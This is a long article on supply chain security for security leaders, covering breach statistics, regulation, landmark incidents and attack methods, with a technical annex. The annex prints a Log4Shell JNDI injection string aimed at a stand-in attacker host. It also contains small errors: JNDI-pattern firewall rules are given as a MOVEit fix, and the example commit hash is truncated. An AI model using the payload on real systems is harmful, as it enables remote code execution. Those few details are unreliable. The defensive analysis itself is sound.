Management Summary
For security leaders, this is no longer a niche topic or a "third-party risk" substream. Supply chain security has become a core enterprise resilience issue. The most important change is not just the increase in attack volume — it is the amplification effect. A single compromised supplier, open-source library, MSP, SaaS integration, or CI/CD dependency can impact hundreds or thousands of downstream organizations at once.
The numbers are now too large to ignore. The article's core data points point in the same direction: 30% of confirmed breaches now involve a third-party or supply chain element, supply chain attacks have multiplied sharply since 2020, and organizations remain materially underprepared in the two areas that matter most: supply chain visibility and incident readiness with partners. In practice, this means many organizations can detect weaknesses inside their own perimeter faster than they can identify which suppliers, sub-processors, software components, and privileged external connections actually matter most.
For a CISO or ISO, the strategic implication is clear: supply chain security should now be treated as a governance, architecture, and assurance discipline, not just as procurement due diligence. It spans vendor inventory, software transparency, access management, security clauses, threat monitoring, testing, and regulatory reporting. Boards and executive committees increasingly expect evidence that management understands not just who the critical suppliers are, but also:
- which third parties support critical business services,
- which suppliers have privileged access or single-point-of-failure status,
- which software components enter production through CI/CD pipelines,
- how incidents will be detected, escalated, and reported when the failure originates outside the company.
Regulation is pushing in the same direction. NIS2, DORA, ISO 27001:2022, and NIST CSF 2.0 all now treat supply chain security as an explicit control domain. The common expectation across all of them is consistent:
- Know your dependencies
- Apply risk-based due diligence and contractual controls
- Monitor suppliers continuously, not annually
- Control and segment third-party access
- Prepare to detect, report, and contain supply chain incidents fast
The practical leadership takeaway is straightforward. The most defensible near-term program consists of five moves:
- Map critical suppliers, software, and external access paths
- Implement SBOM-driven visibility for internally built and vendor-supplied software
- Replace point-in-time vendor assessments with continuous monitoring
- Apply zero trust principles to vendor access, especially MFA, JIT access, PAM, and segmentation
- Run supply chain incident scenarios with legal, procurement, IT, and critical suppliers
Organizations that do these five things will not eliminate supply chain risk. But they will materially improve their ability to prioritize the right suppliers, reduce blast radius, produce audit evidence, and meet reporting timelines when a crisis hits.
1. The Numbers Tell an Unmistakable Story
The big picture
The trend is no longer debatable: supply chain attacks are not rare exceptions anymore. They are now one of the main ways organizations get breached. The business significance is that the risk is harder to see, harder to control directly, and often spreads far beyond the original victim.
Breach volume and growth rates
The acceleration is staggering. The Verizon 2025 DBIR, analyzing 22,052 security incidents and 12,195 confirmed breaches across 139 countries, recorded the highest-ever proportion of third-party involvement at 30%. IBM's X-Force 2026 report showed vulnerability exploitation became the #1 initial attack vector at 40% of all incidents (up from credential abuse), driven largely by supply chain targeting. Group-IB's 2026 High-Tech Crime Trends Report (source) declared supply chain attacks "the dominant force reshaping the global cyber threat landscape," noting cybercrime shifted "decisively away from isolated intrusions toward ecosystem-wide compromise."
Black Kite's 2026 Third-Party Breach Report covers 2025 incidents and provides the most granular picture: 136 verified major breach events produced 719 publicly named victim companies plus an estimated ~26,000 additional impacted organizations — a hidden "shadow layer" that never surfaces publicly. The downstream amplification ratio hit 5.28 victims per breach event, a 106% increase from 2024's ratio of 2.56. Supply chain attacks averaged 26 incidents per month from April 2025, double the ~13/month rate in early 2024, with October 2025 setting a record of 41 attacks in a single month (Cyble).
Sonatype's 2024 State of the Software Supply Chain Report (source) found 512,847 malicious open-source packages in a single year — a 156% year-over-year increase. ReversingLabs documented a 1,300% growth in repository-based malware threats between 2020 and 2023. Cybersecurity Ventures (source) projects global software supply chain attack costs rising from $46 billion (2023) to $60 billion (2025) to $138 billion by 2031.
The practical message is not just that "more attacks are happening." It is that one attack now affects many more organizations than before. A compromise no longer stops at the first victim.
Financial impact and dwell time
IBM's Cost of a Data Breach Report 2025 (source) (Ponemon Institute, 600 organizations, 17 industries, 16 countries) established that supply chain breaches cost an average of $4.91 million — second-highest of any attack vector and well above the global average of $4.44 million. More critically, supply chain compromises take the longest to resolve at 267 days (71 days to identify + 196 days to contain) — exceeding malicious insiders (260 days) and all other vectors. Breaches exceeding 200 days cost $5.01 million versus $3.87 million for those resolved faster, a 29% premium. Black Kite found the median detection time for third-party breaches was just 10 days, but the median disclosure delay was 73 days (average 117 days) — a silent window that cascades risk downstream before anyone knows.
The most relevant executive implications are:
- average supply chain breach cost is materially above the global breach average,
- containment takes longer than for most other breach types,
- delayed supplier disclosure creates a dangerous "silent window" in which customers remain exposed without knowing it,
- longer breaches almost always cost more.
For leadership teams, the lesson is important: the cost driver is not only the initial compromise. It is the combination of:
- delayed visibility,
- cross-company coordination,
- regulatory reporting pressure,
- contractual fallout,
- and prolonged business disruption.
What the major reports say
The WEF Global Cybersecurity Outlook 2025 (source) found 54% of large organizations cite supply chain challenges as their biggest barrier to cyber resilience. Its 2026 edition (source) (804 participants, 92 countries) showed 65% of respondents report supply chain disruption risks increasing, while only 27% simulate cyber incidents with supply chain partners and only 33% comprehensively map their supply chain ecosystems. CISOs ranked supply chain disruption as the #2 concern in both editions.
The IBM X-Force 2026 report highlighted a 49% increase in active ransomware/extortion groups (109 in 2025, up from 73 in 2024) and found 56% of disclosed vulnerabilities required no authentication to exploit — meaning attackers can breach supply chain components without credentials. Manufacturing remained the most-targeted industry for the fifth consecutive year at 27.7% of incidents.
Gartner's 2025 Market Guide reported 60% of large enterprises already deploying software supply chain security tools, projecting 85% by 2028.
| Metric | Value | Source |
|---|---|---|
| Third-party involvement in all breaches | 30% (doubled YoY) | Verizon DBIR 2025 |
| Average supply chain breach cost | $4.91M | IBM Cost of Data Breach 2025 |
| Supply chain breach lifecycle | 267 days | IBM Cost of Data Breach 2025 |
| Individuals affected by third-party breaches (2025) | 433 million | Black Kite 2026 |
| Downstream victims per breach event | 5.28 (up 106%) | Black Kite 2026 |
| Large orgs citing supply chain as top barrier | 54% | WEF GCO 2025 |
| Orgs that map their supply chain ecosystems | 33% | WEF GCO 2026 |
| Malicious open-source packages (1 year) | 512,847 (up 156%) | Sonatype 2024 |
| Projected supply chain attack costs (2025) | $60 billion | Cybersecurity Ventures |
Taken together, the major cyber reports now describe the same problem from different angles:
- security leaders see supply chain dependence as a major resilience barrier,
- only a minority of organizations map their supplier ecosystem comprehensively,
- even fewer exercise incident scenarios with suppliers,
- attackers increasingly exploit no-auth vulnerabilities, OAuth trust, open-source ecosystems, and managed service relationships.
Executive takeaway
For management, the numbers justify a shift in focus:
- from isolated vendor assessments to ecosystem risk management,
- from compliance paperwork to operational readiness,
- and from internal perimeter thinking to dependency-centric defense.
2. A Decade of Landmark Supply Chain Incidents
The big picture
The landmark cases show the same recurring pattern: attackers do not always breach the final target directly. Instead, they compromise a trusted intermediary — software vendor, service provider, open-source maintainer, cloud integration, or remote management platform — and use that trust to scale the attack.
Why these incidents matter
These cases are important not just because they were large, but because each one exposed a specific control failure that many organizations still have today:
- over-trust in software updates,
- insufficient build integrity assurance,
- weak third-party access controls,
- no visibility into software dependencies,
- poor supplier concentration management,
- and limited ability to assess sub-tier exposure.
Landmark incidents and the lesson each one teaches
| Incident | What happened | Strategic lesson |
|---|---|---|
| SolarWinds (2020) | Compromised build pipeline inserted malicious code into signed software updates | Trust in updates must be backed by build integrity controls, monitoring, and software provenance |
| Kaseya VSA (2021) | Exploited MSP tooling to push ransomware downstream | Remote management platforms create one-to-many blast radius and require extra governance |
| Log4Shell (2021) | Ubiquitous open-source library exposed vast numbers of systems | SBOM visibility is essential for rapid exposure identification |
| 3CX (2023) | A supply chain attack was itself initiated through another supply chain attack | Dependencies can be multi-layered, and risk extends beyond direct suppliers |
| MOVEit (2023) | Mass exploitation of a widely used file transfer platform | Shared platforms create concentration risk across entire sectors |
| XZ Utils (2024) | Long-term social engineering of an open-source maintainer nearly led to widespread compromise | Open-source trust models need integrity validation and ecosystem monitoring |
| Polyfill.io (2024) | Domain takeover led to malicious script delivery at scale | External scripts should be protected with Subresource Integrity and dependency governance |
| Change Healthcare (2024) | Stolen credentials and lack of MFA caused systemic disruption in healthcare | Basic access controls such as MFA and segmentation still prevent catastrophic outcomes |
| Oracle / GitHub Actions / M&S / Snowflake / npm cases (2025–2026) | Legacy platforms, SaaS trust, CI/CD pipelines, and third-party helpdesks became attack paths | Supply chain defense must cover identity, CI/CD, SaaS, support workflows, and legacy estates |
Full technical details for each incident — including CVEs, MITRE ATT&CK mappings, attack chains, and specific prevention controls — are provided in Annex A.
Executive interpretation
The incidents differ technically, but they repeat the same business story:
- a trusted dependency is compromised,
- detection is delayed,
- the impact spreads to customers,
- the customer often lacks immediate visibility,
- regulators, customers, and media treat the customer as accountable anyway.
That is why supply chain risk is no longer just a procurement or technology issue. It is a shared accountability problem across security, IT, architecture, legal, compliance, procurement, and business continuity.
3. How Attackers Compromise the Supply Chain
The big picture
Attackers increasingly prefer the supply chain because it is efficient. Instead of attacking one company at a time, they compromise something trusted and reusable — such as a software package, a remote management platform, an OAuth integration, or a build process — and let the trust relationship do the rest.
Why this matters for leadership
Understanding how attackers exploit the supply chain is not a technical exercise — it is a strategic planning input. Each attack method targets a different type of trust relationship. If leadership does not know which types of trust their organization depends on most, they cannot prioritize defenses, allocate budget, or ask the right questions of their teams and suppliers.
The common factor across all methods is the same: attackers do not need to beat every control directly if they can abuse a trusted relationship already embedded in your environment.
Supply chain attack methods at a glance
| Attack method | What is exploited | Why it scales | Real-world example | Key defensive priority |
|---|---|---|---|---|
| CI/CD pipeline compromise | The build and release process itself | Malicious code is distributed as legitimate software to all users | SolarWinds, Codecov, tj-actions | Build integrity, pipeline isolation, signed releases |
| Dependency confusion & typosquatting | Package manager trust in names and versions | Malicious packages enter builds automatically, without conscious procurement | Alex Birsan PoC (35+ orgs), PhantomRaven | Private namespace controls, lock files, package allow-listing |
| OAuth token compromise | Persistent API-level trust between SaaS applications | One stolen token bypasses MFA and moves laterally across interconnected platforms | Salesloft/Drift (700+ orgs), Chrome extensions | App consent governance, least privilege, token monitoring |
| Open-source poisoning | Maintainer trust, social engineering, publishing credentials | Compromised libraries propagate to thousands of downstream projects | XZ Utils, xrpl.js, eslint-config-prettier, protestware | Dependency health monitoring, reproducible builds, SBOM |
| MSP / supplier access compromise | Privileged, persistent remote access to client environments | One compromised MSP gives access to hundreds of client networks | Kaseya, APT10 Cloud Hopper, M&S via TCS | Zero trust for vendor access, MFA, segmentation, PAM |
The typical attack path
While the technical details differ (see Annex B for full technical breakdowns, MITRE ATT&CK mappings, and specific controls), the business-level attack path is remarkably consistent:
- Identify a trusted intermediary — a software vendor, open-source library, managed service provider, SaaS integration, or CI/CD component that many organizations depend on.
- Compromise the intermediary — through vulnerability exploitation, credential theft, social engineering, or long-term infiltration of an open-source project.
- Inject malicious capability — into software updates, build artifacts, package registries, OAuth tokens, or remote management tools.
- Let trust do the distribution — the malicious payload spreads through normal business processes: software updates, automated builds, API integrations, or remote administration sessions.
- Exploit access at scale — exfiltrate data, deploy ransomware, steal credentials, or establish persistent access across dozens, hundreds, or thousands of downstream organizations simultaneously.
The critical insight for leadership is that steps 3 and 4 happen inside trusted channels. Traditional perimeter defenses, endpoint controls, and even user-focused security awareness do not reliably catch threats that arrive through a legitimate software update, an authorized integration, or an approved vendor's remote session.
Executive interpretation
Five patterns emerge from the way attackers operate:
- Trust is the attack surface. Every trusted relationship — vendor access, software dependency, SaaS integration, build pipeline — is a potential entry point. The more trust an organization extends without verification, the larger its exposure.
- One compromise, many victims. The amplification effect is not accidental — it is the attacker's objective. Compromising a single MSP, library, or CI/CD action can provide access to hundreds or thousands of downstream targets simultaneously.
- Invisible entry, delayed detection. Because attacks arrive through trusted channels, they bypass many conventional detection mechanisms. Organizations often learn about the compromise from external notification, not internal monitoring.
- The risk extends beyond direct suppliers. Sub-tier dependencies, open-source maintainers, SaaS-to-SaaS integrations, and CI/CD components create exposure that most organizations do not map or monitor.
- Basic controls still prevent catastrophic outcomes. MFA, network segmentation, least-privilege access, dependency pinning, and build integrity verification would have prevented or significantly limited the majority of the incidents reviewed in this article.
Executive takeaway
If section 2 explained why the problem is serious, section 3 explains why it scales. The defensive implication is that supply chain security cannot be addressed by a single tool or team. It requires coordinated action across security architecture, software engineering, vendor management, identity governance, and incident response — with executive visibility into which trust relationships carry the most risk.
Conclusion: The Supply Chain Is the Perimeter Now
The evidence leads to one conclusion: supply chain security is no longer a subcategory of cyber risk. It is now one of the primary ways enterprise risk materializes. When a third of breaches involve third parties, when one compromised dependency can ripple across thousands of organizations, and when regulators explicitly require supplier risk controls, traditional inside-out security thinking is no longer enough.
For management, the real challenge is not whether the threat is serious — that is already clear. The challenge is operational maturity. Most organizations still struggle with the fundamentals:
- incomplete supplier mapping,
- limited visibility into sub-tier dependencies,
- weak control over third-party access,
- insufficient software transparency,
- and under-tested response coordination with suppliers.
The strategic priority for CISOs, ISOs, and resilience leaders should therefore be to move supply chain security into the same governance category as identity, vulnerability management, and incident response. It needs formal ownership, executive reporting, audit-ready evidence, and risk-based investment.
Three priorities stand out:
- Visibility first — Map critical suppliers, privileged access paths, and software dependencies.
- Control trust relationships — Apply strong identity, segmentation, contractual controls, and continuous monitoring.
- Prepare for failure — Build supply chain incident playbooks, reporting readiness, and cross-functional exercises.
Organizations that do these things will not avoid every breach. But they will be far better positioned to detect sooner, contain faster, report correctly, and defend their decisions when the next supply chain incident occurs.
Technical Incident Details
SolarWinds SUNBURST (2020) — The Attack That Changed Everything
Russia's SVR (APT29/NOBELIUM) compromised SolarWinds' Orion Platform build system starting September 2019. Using a build-process implant called SUNSPOT (taskhostsvc.exe), attackers monitored MsBuild.exe processes and injected the SUNBURST backdoor into SolarWinds.Orion.Core.BusinessLayer.dll. The trojanized DLL was digitally signed with SolarWinds' legitimate certificate and distributed via routine updates (versions 2019.4 HF 5, 2020.2, 2020.2 HF 1).
SUNBURST employed a 12–14 day dormancy period, a custom Domain Generation Algorithm for DNS-based C2 via avsvmcloud[.]com, and steganography for data exfiltration. It scanned for antivirus and forensic tools before activating. Second-stage payloads included TEARDROP (decoding a Cobalt Strike Beacon from a fake JPEG), RAINDROP, SUNSHUTTLE/GoldMax, and Sibot. Post-exploitation TTPs included SAML token forgery and IFEO debugger persistence.
FireEye discovered the breach on December 8, 2020, after detecting theft of its Red Team tools. ~18,000 organizations downloaded compromised updates; approximately 100 were actively targeted, including the US Departments of Treasury, State, Commerce, Homeland Security, and Energy. SolarWinds' stock dropped ~40%; insured losses reached an estimated $90 million.
Key CVE: CVE-2020-10148 (Orion API authentication bypass) — NVD
MITRE ATT&CK techniques (Campaign C0024 — source):
- T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain) — link
- T1553.002 (Subvert Trust Controls: Code Signing) — link
- T1606.002 (Forge Web Credentials: SAML Tokens) — link
- T1568.002 (Dynamic Resolution: Domain Generation Algorithms) — link
Prevention: Build integrity verification with reproducible builds, egress filtering on build and monitoring servers, SAML token anomaly detection, and build environment isolation. ISO 27001:2022 Annex A Control A.5.21 (ICT supply chain component integrity verification — ISO) and NIST CSF 2.0 GV.SC-07 (ongoing supplier risk monitoring — CSF Tools) directly address build-process integrity.
Kaseya VSA (2021) — MSP Compromise at Scale
REvil ransomware exploited zero-day vulnerabilities in Kaseya VSA on-premises servers on July 2, 2021 (Independence Day weekend). The attack chain: authentication bypass → payload upload → fake "Kaseya VSA Agent Hot-fix" pushed to all managed endpoints → PowerShell disabled Windows Defender → certutil.exe (LOLBin) decoded the encrypted payload → DLL sideloading using a vulnerable old MsMpEng.exe loading malicious mpsvc.dll → REvil encryption. The attack compromised ~60 MSPs and 800–1,500 downstream businesses, including Swedish supermarket chain Coop (800 stores closed for a week). REvil demanded $70 million; a universal decryptor was obtained July 22.
Key CVEs:
- CVE-2021-30116 (Authentication bypass) — NVD
- CVE-2021-30117 (SQL injection) — NVD
- CVE-2021-30118 (Remote code execution) — NVD
- CVE-2021-30119 (Cross-site scripting) — NVD
- CVE-2021-30120 (2FA bypass) — NVD
MITRE ATT&CK techniques:
- T1190 (Exploit Public-Facing Application) — link
- T1562.001 (Impair Defenses: Disable or Modify Tools) — link
- T1574.002 (Hijack Execution Flow: DLL Side-Loading) — link
- T1486 (Data Encrypted for Impact) — link
Prevention: Prompt patching of critical RMM vulnerabilities, network segmentation between MSP and client environments, endpoint detection on managed systems, and contractual security requirements. ISO 27001 A.5.22 (monitoring supplier performance) and DORA Article 29 (ICT concentration risk) — DORA — would have flagged sole-source MSP dependency.
Log4Shell (2021) — When SBOM Became Non-Negotiable
CVE-2021-44228 (CVSS 10.0) — NVD — in Apache Log4j 2 exploited JNDI lookup functionality in logged messages. An attacker injecting ${jndi:ldap://attacker.com/malicious} into any logged input triggered a remote class load and full RCE. Affected versions: log4j-core 2.0-beta9 through 2.14.1 (the vulnerability existed since 2013). Cascading fixes followed:
- CVE-2021-45046 (incomplete fix bypass, CVSS 9.0) — NVD
- CVE-2021-45105 (DoS) — NVD
- CVE-2021-44832 (config-based RCE) — NVD
Chen Zhaojun of Alibaba Cloud Security reported it privately on November 24, 2021; mass exploitation began December 9. 93% of cloud enterprise environments were vulnerable (Wiz/EY); as of December 2022, 25% of Log4j downloads still used vulnerable versions. The US DHS estimated full remediation would take at least a decade. Observed payloads included Kinsing cryptominer, Cobalt Strike, Mirai botnet, and Conti ransomware.
Log4Shell is the defining case for SBOM value: organizations with SBOMs identified exposure in minutes by querying for log4j-core versions 2.0–2.14.1. Without SBOMs, teams spent days to weeks manually auditing. This single incident accelerated enterprise SBOM adoption more than any regulation.
Prevention: Maintain an SBOM in SPDX or CycloneDX format enabling rapid component inventory queries. Implement automated dependency scanning in CI/CD with tools such as Grype or OWASP Dependency-Check. Enforce network egress controls from application servers to block LDAP/RMI callbacks.
3CX (2023) — The First Cascading Supply Chain Attack
North Korean state actors (Lazarus Group/UNC4736) executed the first publicly documented supply chain attack that originated from another supply chain attack. Attackers first compromised Trading Technologies' discontinued X_TRADER software, embedding the VEILEDSIGNAL backdoor. A 3CX employee downloaded the trojanized X_TRADER on a personal computer → VEILEDSIGNAL provided admin access → stolen VPN credentials → lateral movement into 3CX's Windows and macOS build environments.
Trojanized 3CX Desktop App versions deployed SUDDENICON (GitHub-based C2 retrieval), ICONICSTEALER (browser data theft), TAXHAUL (DLL persistence via IKEEXT service hijacking), COLDCAT (HTTPS C2), and Gopuram (targeted at cryptocurrency companies). The attack used SIGFLIP (source) exploiting CVE-2013-3900 (NVD) for signature-preserving code injection. 3CX serves 600,000+ customers and 12 million users.
MITRE ATT&CK Campaign C0057 — source
- T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain) — link
- T1574.001 (Hijack Execution Flow: DLL Search Order Hijacking) — link
- T1620 (Reflective Code Loading) — link
Prevention: Binary-level verification of developer workstations and personal devices; zero trust policies preventing unmanaged devices from accessing build infrastructure; mandatory code signing with Sigstore enabling tamper-evident artifact transparency. ISO 27001 A.5.21 explicitly requires hardware and software component integrity verification throughout the ICT supply chain.
MOVEit Transfer (2023) — Mass Exploitation via SQL Injection
Cl0p ransomware group exploited CVE-2023-34362 (CVSS 9.8) — NVD — a SQL injection zero-day in Progress Software's MOVEit Transfer. The exploit manipulated the database to configure a trusted attacker-controlled identity provider, then forged a sysadmin JWT token. Cl0p deployed the LEMURLOOT web shell (human2.aspx), which required authentication via a hard-coded password in the X-siLock-Comment header. Kroll and GreyNoise found Cl0p had been testing the vulnerability since July 2021.
Additional CVEs followed:
- CVE-2023-35036 (SQL injection variant) — NVD
- CVE-2023-35708 (SQL injection variant) — NVD
- CVE-2023-36934 (authentication bypass) — NVD
Final tally: 2,773+ organizations and approximately 95.8 million individuals affected (Emsisoft). Estimated total cost: $12–16 billion. Cl0p notably did not deploy ransomware — they used pure data exfiltration and extortion. CISA advisory: AA23-158A
MITRE ATT&CK techniques:
- T1190 (Exploit Public-Facing Application) — link
- T1505.003 (Server Software Component: Web Shell) — link
- T1078 (Valid Accounts) — link
Prevention: Web Application Firewall rules blocking JNDI-pattern payloads, strict parameterized queries, network segmentation isolating managed file transfer servers, and rapid patch application (Progress issued a patch on the day of public disclosure). NIS2 Article 21(2)(d) — source — mandates supply chain security practices that would require customers to vet a critical file transfer dependency; ISO 27001 A.5.22 requires monitoring of suppliers when security incidents occur.
XZ Utils (2024) — A Two-Year Social Engineering Masterpiece
CVE-2024-3094 (CVSS 10.0) — NVD. A developer using the pseudonym "Jia Tan" spent over two years contributing to XZ Utils, gradually gaining maintainer trust. Suspected sock puppet accounts pressured the original sole maintainer, exploiting open-source burnout. In February 2024, Jia Tan inserted a backdoor into XZ Utils versions 5.6.0 and 5.6.1 targeting liblzma.
The backdoor was hidden only in release tarballs (not the git repository), inside modified build-to-host.m4 and obfuscated test files using RC4 encryption. At runtime, it exploited glibc's IFUNC mechanism to hook RSA_public_decrypt in OpenSSH (loaded via sshd → libsystemd → liblzma). The hooked function extracted commands from the RSA key's modulus, decrypted with ChaCha20, validated with a hard-coded Ed448 public key, and passed validated commands to system() — achieving pre-authentication RCE.
Microsoft engineer Andres Freund discovered it accidentally on March 28, 2024, after noticing 500ms SSH login latency on a Debian Sid installation. Had it reached stable releases weeks later, it would have compromised hundreds of millions of production servers.
MITRE ATT&CK techniques:
- T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain) — link
- T1574.006 (Hijack Execution Flow: Dynamic Linker Hijacking) — link
- T1556 (Modify Authentication Process) — link
Prevention: Require reproducible builds for all release artifacts (SLSA Level 3); audit release tarballs against git repository source with automated diffing tools; implement OpenSSF Scorecard continuous health assessment for critical open-source dependencies; apply libsystemd privilege separation to isolate sshd from unnecessary shared libraries. This incident illustrates why NIS2 Article 22 (coordinated risk assessment for critical ICT products — source) is crucial: EU-level identification of liblzma as critical infrastructure would have triggered enhanced integrity monitoring.
Polyfill.io (2024) — CDN Domain Takeover at Scale
In February 2024, a Chinese CDN company called Funnull acquired the polyfill.io domain. The new operators injected malicious JavaScript targeting mobile users — redirecting them to sports betting and scam sites via a fake Google Analytics domain (googie-anaiytics.com). Evasion mechanisms included mobile-only targeting, admin cookie detection, analytics service detection, delayed execution, randomized triggering (~10% of sessions), and heavy obfuscation.
384,773 hosts still embedded the malicious script as of July 2, 2024 (Censys). Affected sites included JSTOR, Intuit, WEF, Hulu, and Mercedes-Benz.
MITRE ATT&CK techniques:
- T1584.001 (Acquire Infrastructure: Compromise Infrastructure — Domains) — link
- T1480 (Execution Guardrails) — link
Prevention — the critical one-liner: Add Subresource Integrity (SRI) attributes to all externally loaded scripts. Example:
<script src=""
integrity="sha384-[hash]"
crossorigin="anonymous"></script> Browsers cryptographically reject tampered files before execution. This single control would have completely neutralized the Polyfill.io attack. The MDN SRI reference is at MDN. Additional mitigation: adopt self-hosted alternatives (Cloudflare and Fastly both offered free replacements within 24 hours of disclosure). ISO 27001 A.5.21 requires integrity verification of ICT components — SRI is the web-layer implementation of this control.
Change Healthcare (2024) — A Single Point of Failure for US Healthcare
ALPHV/BlackCat ransomware affiliates used stolen credentials of a low-level customer support employee to access a Citrix remote access portal without MFA on February 12, 2024. Attackers spent 9 days moving laterally through poorly segmented networks before deploying ransomware on February 21. UnitedHealth paid a $22 million Bitcoin ransom — which failed to protect data after ALPHV's leadership executed an exit scam, with the affiliate later engaging RansomHub for a second extortion attempt.
Change Healthcare processes 15 billion healthcare transactions annually and handles 1 in 3 US patient records. Final impact: 192.7 million individuals (HIPAA Guide) — nearly two-thirds of the US population and the largest healthcare data breach in history. Total costs reached $3.1 billion (UnitedHealth Q4 2024 earnings). An AHA survey of ~1,000 hospitals found 74% reported direct patient care impact and 94% reported financial impact (AHA).
MITRE ATT&CK techniques:
- T1078 (Valid Accounts) — link
- T1133 (External Remote Services) — link
- T1486 (Data Encrypted for Impact) — link
Prevention: MFA alone would likely have prevented the entire attack. This incident also represents a textbook DORA Article 29 (source) concentration risk failure: systemic dependence on a single payment processor meant a single breach cascaded to the entire US healthcare payment ecosystem. ISO 27001 A.5.19 (supplier vetting) would require MFA as a baseline contractual requirement. NIS2 Article 23 (source) 24-hour early warning obligations would have triggered immediate cross-sector notification.
Oracle (2025) — Two Breaches Exposing Legacy Risk
Two concurrent incidents hit Oracle in early 2025. In the Oracle Cloud Classic SSO/LDAP breach, threat actor "rose87168" exfiltrated approximately 6 million records from SSO and LDAP systems spanning 140,000+ tenants, reportedly exploiting CVE-2021-35587 (Oracle Access Manager unauthenticated RCE, CVSS 9.8) — NVD — on severely outdated Oracle Fusion Middleware 11G servers. The attacker demanded 100,000 Monero (~$200 million). Separately, the Oracle Health (Cerner) breach saw compromised credentials access legacy data migration servers, exposing patient health records across at least 16 health systems.
Key lesson: Running end-of-life software in a production cloud environment representing critical infrastructure violates the most basic supply chain hygiene. ISO 27001 A.5.22 requires monitoring, review, and change management of supplier services — including software lifecycle status. NIS2 Article 21(2)(e) (source) requires security in acquisition and maintenance of network and information systems.
tj-actions/changed-files GitHub Actions Compromise (March 2025)
A cascading attack compromised the popular GitHub Action tj-actions/changed-files (used in 23,000+ repositories). CVE-2025-30066 (CVSS 8.6) — NVD. The chain: compromised SpotBugs maintainer PAT → hijacked reviewdog/action-setup token → poisoned tj-actions/eslint-changed-files → poisoned tj-actions/changed-files. The attacker modified all existing version tags to point to a malicious commit that dumped CI/CD secrets to public build logs. Palo Alto's Unit 42 revealed the true target was Coinbase — the attacker obtained write access to coinbase/agentkit before pivoting broadly.
MITRE ATT&CK techniques:
- T1677 (Poisoned Pipeline Execution, added ATT&CK v18 May 2025) — link
- T1552.001 (Unsecured Credentials: Credentials in Files) — link
Prevention: Pin GitHub Actions to full commit SHAs rather than mutable tags (e.g., uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af68 instead of uses: actions/checkout@v4). Use OpenSSF's scorecard-action to continuously audit third-party Actions. Implement branch protection rules preventing tag reassignment.
Additional Notable 2025–2026 Incidents
The Marks & Spencer attack (April 2025) by Scattered Spider via DragonForce ransomware, originating through third-party vendor TCS's IT helpdesk via social engineering, resulted in £300 million+ in lost operating profit and 46+ days of suspended online orders. The Snowflake customer breaches (mid-2024) saw UNC5537 compromise 165 customer environments (including AT&T's 110 million customer records) using infostealer-harvested credentials — none had MFA enabled. The Chrome extension supply chain campaign (December 2024) compromised 36+ extensions with 2.6 million users via a single phished Cyberhaven developer OAuth token. The xrpl.js npm compromise (April 2025) saw phished Ripple employee npm credentials poison the official XRP Ledger SDK (140,000+ weekly downloads) to exfiltrate private keys. The Jaguar Land Rover attack (August 2025) halted global production for five weeks with estimated losses of £1.9 billion — the most economically damaging cyber incident in UK manufacturing history.
Technical Details: How Attackers Compromise the Supply Chain
CI/CD pipeline attacks exploit the build process itself
Modern software delivery pipelines are now a frontline attack surface. If attackers can modify build logic, pipeline secrets, or release artifacts, they can inject malicious code into legitimate software and distribute it at scale.
MITRE ATT&CK v18 introduced T1677 (Poisoned Pipeline Execution) — link — in May 2025, recognizing CI/CD as a distinct attack surface. Three sub-types exist:
- Direct PPE: Modifying CI config files (e.g.,
.github/workflows/*.yml,.gitlab-ci.yml) to inject malicious steps - Indirect PPE: Injecting into files referenced by CI config — Makefiles, test scripts, linters — exploiting unsafe use of
${{ github.event.pull_request.title }}interpolation - Public PPE: Malicious pull requests from forks exploiting the
pull_request_targettrigger, which runs in the context of the base branch with access to secrets
SolarWinds exemplifies build-process compromise; the Codecov Bash Uploader breach (2021) showed secret exfiltration — a single injected curl line exfiltrated all environment variables from 29,000+ enterprise customers' CI environments for two months.
What this means operationally
- protect CI/CD platforms as critical infrastructure,
- isolate build environments,
- enforce signed builds and release provenance,
- monitor for anomalous pipeline changes,
- restrict and rotate pipeline secrets.
Dependency confusion and typosquatting poison package registries
Attackers exploit the fact that package managers trust names and versions. If a malicious package looks sufficiently similar to an internal or popular package, it may be pulled automatically into builds.
Dependency confusion (T1195.001 — link) exploits how package managers resolve names when both private and public registries are configured. Alex Birsan's 2021 proof-of-concept successfully executed code at 35+ organizations including Apple, Microsoft, PayPal, and Tesla by publishing public packages with identical names to internal packages but higher version numbers, earning $130,000+ in bounties. Orca Security found 49% of organizations remain vulnerable (source).
Typosquatting uses near-identical names — character omissions (reqeusts), delimiter confusion (crossenv vs cross-env), and scope mimicry. A new variant, slopsquatting, registers package names hallucinated by LLMs — research shows 5–38% hallucination rates for package names across leading models. The PhantomRaven campaign (August 2025) used slopsquatting to compromise 126 packages with 86,000 installs.
What matters most
- private package namespace controls,
- lock files and hash verification,
- package allow-listing,
- automated dependency scanning,
- developer awareness of typosquatting and slopsquatting risks.
OAuth token compromise enables silent lateral movement
Modern SaaS environments are deeply interconnected. OAuth tokens can grant persistent API-level access, often bypassing the visibility organizations expect from user-centric controls.
T1528 (Steal Application Access Token) — link — describes how compromised OAuth tokens bypass MFA entirely and enable movement across interconnected SaaS applications. The Salesloft/Drift breach (August 2025) saw attackers steal OAuth tokens from the Drift chatbot integration, gaining API-level access to Salesforce data at 700+ organizations. Organizations average 112 SaaS applications (BetterCloud), each expanding the OAuth attack surface.
Priority controls
- app consent governance,
- least privilege for integrations,
- continuous token and app monitoring,
- rapid revocation capability,
- review of cross-tenant or multi-tenant integrations.
Open-source poisoning follows the XZ playbook
The XZ case showed that not all open-source risk looks like a vulnerability. Sometimes the risk is social, procedural, and long-term: maintainer burnout, unreviewed releases, release-to-source mismatches, or compromised publishing credentials.
XZ Utils established the template: multi-year trust-building, social engineering of overburdened maintainers, and insertion of sophisticated backdoors. The pattern is repeating: the xrpl.js npm package was compromised via phishing a Ripple employee's npm credentials; the eslint-config-prettier package was compromised via a phished maintainer affecting 14,000+ downstream packages. Protestware adds another dimension: the node-ipc maintainer deliberately sabotaged systems with Russian/Belarusian IPs in 2022; the colors.js and faker.js maintainer deliberately introduced infinite loops in libraries with millions of weekly downloads.
Leadership takeaway: software risk is not only about known CVEs. It is also about whether the software supply process itself is trustworthy.
MSP compromise creates one-to-many amplification
Managed service providers, IT outsourcers, support desks, and remote administration vendors often have the access attackers want most: privileged, persistent, and trusted.
